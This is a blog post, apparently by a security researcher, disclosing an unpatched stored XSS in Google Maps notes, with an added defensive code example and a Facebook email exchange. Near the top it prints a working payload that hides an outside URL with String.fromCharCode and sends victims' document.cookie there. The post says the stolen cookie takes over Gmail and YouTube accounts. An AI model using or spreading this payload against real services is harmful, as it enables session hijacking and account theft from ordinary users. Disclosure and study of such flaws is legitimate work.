Unfixed Google hack
Hi there folks, we are happy to tell you that Fredrik, Mathias and I (Jelmer) are all in the Google Security Hall of Fame for our findings.
The latest unpublished XSS for which I got in the Hall of Fame is still unpatched.
Here is the PoC I sent Google:
http://maps.google.com/?z=4&pw=2
And insert this inside the notes:
<img src='unicorn.jpg' onerror='document.location=String.fromCharCode(104,116,116,112,58,47,47, 103,111,111,103,108,101,95,120,115,115,46,97,99,107,97,99,107,46,110,101, 116,47,99,111,111,107,105,101,101,101,101,101,101,101,115,46,112,104,112, 63,99,111,111,107,105,101,61)+document.cookie'>
The PoC we sent to Google is located here.
It will give us your cookie, with which we can take over your Google account, including things like Gmail and YouTube, so beware!
For a simple PoC you probably just want to go to:
http://maps.google.com/?z=4&pw=2
And insert this in the notes:
<img src='unicorn.jpg' onerror='alert(/XSS by AckAck.net/)'>
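The defensive side of the PoC above, as an added example that is not from the original post and not Google's code: the note is HTML-encoded on output so the `<img ... onerror=...>` string stays plain text, and a small audit reports whether a session cookie could be read through `document.cookie`. The function names (`escapeHtml`, `renderNote`, `auditSetCookie`) and the sample `SID` cookie headers are assumptions made for illustration.

```javascript
// Added example (not Google's code): keep note text inert on output and
// check whether a session cookie would be visible to document.cookie.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag, attribute value or entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical renderer for a saved note: the note is only ever placed in
// element content, and only after encoding, so markup in it stays text.
function renderNote(note) {
  return '<div class="note">' + escapeHtml(note) + '</div>';
}

// Parse one Set-Cookie header value and report the two flags that matter here.
function auditSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const name = pair.slice(0, pair.indexOf('='));
  const flags = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  return {
    name,
    readableByScript: !flags.has('httponly'), // exposed via document.cookie
    sentOverHttp: !flags.has('secure'),       // also sent on plain http://
  };
}

// The simple PoC string from the post, used as test input.
const POC_NOTE = "<img src='unicorn.jpg' onerror='alert(/XSS by AckAck.net/)'>";

// Constructed sample headers; the cookie name and value are made up.
const WEAK_COOKIE = 'SID=abc123; Path=/';
const HARDENED_COOKIE = 'SID=abc123; Path=/; Secure; HttpOnly';

console.log(renderNote(POC_NOTE));
console.log(auditSetCookie(WEAK_COOKIE));
console.log(auditSetCookie(HARDENED_COOKIE));
```

HttpOnly does not stop an injected script from running; it only keeps the session cookie out of `document.cookie`, so encoding the note on output remains the actual fix.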
For other things we published about Google you can check these previous blog posts:
How to use google as your proxy
Google dorks 2.0
Google adwords xsses
Googleapis xss
We had a message back from Facebook from my latest post in which I took on a Facebook worm. Here is the email conversation:
Hi Jelmer,
Thanks for sending this in. Awesome blog post. Please do send in new findings via this same email if you wish.
Thanks for contacting Facebook,
Facebook
-----Original Message to Facebook-----
From: Jelmer 00 (jelmerdehen@hotmail.com)
To: The Facebook Team
Subject: RE: Report a Possible Security Vulnerability
Hey,
Did some research on a specific type of worm using Facebook at the moment. Here are the details with actions you could take: http://h.ackack.net/taking-down-facebook-worms.html
Sincerely,
-Jelmer de Hen
-----End Original Message to Facebook-----
I also contacted infowar-monitor.net (the boys who took down Koobface) with my Facebook worm research to maybe cooperate and be able to legally take down the spammers, but I had no response.
If you want a great read about how they took down Koobface you can read their paper; it's a great read and can be found here (mirror).
Anyway let's hope Google patches this gaping hole in their website soon.

Hello, I am Jelmer, born in 1991, and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email at jelmerdehen [ at ] hotmail [d0t] com, or you can chat with me on IRC.